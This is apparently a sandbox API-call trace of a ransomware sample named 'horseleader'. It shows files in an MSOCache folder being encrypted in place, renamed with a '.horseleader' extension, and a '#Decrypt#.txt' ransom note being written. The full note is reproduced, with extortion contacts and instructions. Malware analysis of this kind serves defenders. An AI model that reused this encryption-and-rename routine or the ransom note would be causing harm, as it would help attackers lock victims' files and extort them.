returned 1 [0208.827] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0208.827] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1f170f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.827] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0208.903] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0208.904] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0208.904] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3e2e1f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.904] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0208.958] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0208.958] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0208.959] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.959] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0208.959] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0208.959] CloseHandle (hObject=0x21c) returned 1 [0208.959] GetProcessHeap () returned 0x780000 [0208.959] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0208.959] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.horseleader") returned 91 [0208.960] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.horseleader")) returned 1 [0208.960] GetProcessHeap () returned 0x780000 [0208.960] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0208.961] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee3b15e0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x264400, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="GrooveMUI.msi", cAlternateFileName="GROOVE~1.MSI")) returned 1 [0208.961] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="Windows") returned -1 [0208.961] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 80 [0208.961] StrStrIW (lpFirst="GrooveMUI.msi", lpSrch=".horseleader") returned 0x0 [0208.961] lstrcmpW (lpString1="GrooveMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0208.961] lstrcmpW (lpString1="GrooveMUI.msi", lpString2="_uninstalling_.png") returned 1 [0208.961] lstrlenW (lpString=".testttjffg") returned 11 [0208.961] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi", lpSrch=".testttjffg") returned 0x0 [0208.961] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0208.961] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0208.961] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0208.962] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 80 [0208.962] StrStrW (lpFirst="GrooveMUI.msi", lpSrch=".txt") returned 0x0 [0208.962] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2507776) returned 1 [0208.962] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.962] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0209.052] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0209.052] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0209.052] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12fa00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.052] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0209.343] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0209.343] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0209.344] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x25f400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.344] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0209.380] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0209.380] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0209.381] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.381] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0209.381] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0209.381] CloseHandle (hObject=0x21c) returned 1 [0209.381] GetProcessHeap () returned 0x780000 [0209.381] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0209.381] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.horseleader") returned 92 [0209.381] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.horseleader")) returned 1 [0209.382] GetProcessHeap () returned 0x780000 [0209.382] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0209.382] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="GrooveMUI.xml", cAlternateFileName="GROOVE~1.XML")) returned 1 [0209.382] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="Windows") returned -1 [0209.383] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 80 [0209.383] StrStrIW (lpFirst="GrooveMUI.xml", lpSrch=".horseleader") returned 0x0 [0209.383] lstrcmpW (lpString1="GrooveMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0209.383] lstrcmpW (lpString1="GrooveMUI.xml", lpString2="_uninstalling_.png") returned 1 [0209.383] lstrlenW (lpString=".testttjffg") returned 11 [0209.383] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpSrch=".testttjffg") returned 0x0 [0209.383] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0209.383] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0209.383] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0209.383] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 80 [0209.383] StrStrW (lpFirst="GrooveMUI.xml", lpSrch=".txt") returned 0x0 [0209.383] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=913) returned 1 [0209.384] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x391, lpOverlapped=0x0) returned 1 [0209.387] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffc6f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0209.387] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x391, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x391, lpOverlapped=0x0) returned 1 [0209.387] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.387] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0209.387] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0209.387] CloseHandle (hObject=0x21c) returned 1 [0209.388] GetProcessHeap () returned 0x780000 [0209.388] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0209.388] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.horseleader") returned 92 [0209.388] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.horseleader")) returned 1 [0209.401] GetProcessHeap () returned 0x780000 [0209.401] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0209.401] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0209.401] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0209.401] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0209.401] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0209.401] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0209.401] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0209.401] lstrlenW (lpString=".testttjffg") returned 11 [0209.401] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0209.401] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0209.401] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0209.401] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0209.402] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0209.402] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0209.402] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1452) returned 1 [0209.402] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5ac, lpOverlapped=0x0) returned 1 [0209.405] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffa54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0209.405] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5ac, lpOverlapped=0x0) returned 1 [0209.405] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.405] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0209.405] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0209.405] CloseHandle (hObject=0x21c) returned 1 [0209.406] GetProcessHeap () returned 0x780000 [0209.406] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0209.406] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0209.406] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0209.407] GetProcessHeap () returned 0x780000 [0209.407] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0209.407] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0209.407] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0209.407] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0209.407] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0209.407] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0209.408] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0209.409] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0209.409] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0209.409] CloseHandle (hObject=0x1cc) returned 1 [0209.410] GetProcessHeap () returned 0x780000 [0209.410] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0209.410] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-0115-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~1")) returned 1 [0209.410] 